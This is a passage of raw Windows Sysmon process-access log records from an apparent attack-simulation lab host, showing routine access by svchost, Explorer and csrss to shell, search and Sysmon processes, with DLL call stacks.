09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8D2A-6151-9600-00000000FD01}46325756C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8D2A-6151-9600-00000000FD01}46325756C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+4bfa5|C:\Windows\System32\TwinUI.dll+23084|C:\Windows\System32\TwinUI.dll+23138|C:\Windows\System32\TwinUI.dll+2444f|C:\Windows\System32\TwinUI.dll+22a1d|C:\Windows\System32\TwinUI.dll+22871|C:\Windows\System32\TwinUI.dll+15bffd|C:\Windows\System32\TwinUI.dll+ced8f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:45.185{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+4bfa5|C:\Windows\System32\TwinUI.dll+230ec|C:\Windows\System32\TwinUI.dll+23125|C:\Windows\System32\TwinUI.dll+2444f|C:\Windows\System32\TwinUI.dll+22a1d|C:\Windows\System32\TwinUI.dll+22871|C:\Windows\System32\TwinUI.dll+15bffd|C:\Windows\System32\TwinUI.dll+ced8f|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.920{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.920{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001056377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.905{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.905{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.889{5EBD8912-8D2A-6151-9600-00000000FD01}46325808C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.889{5EBD8912-8D2A-6151-9600-00000000FD01}46325808C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.889{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.889{5EBD8912-8D26-6151-8500-00000000FD01}27604704C:\Windows\system32\csrss.exe{5EBD8912-8D66-6151-AB00-00000000FD01}5876C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.779{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.779{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:46.779{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 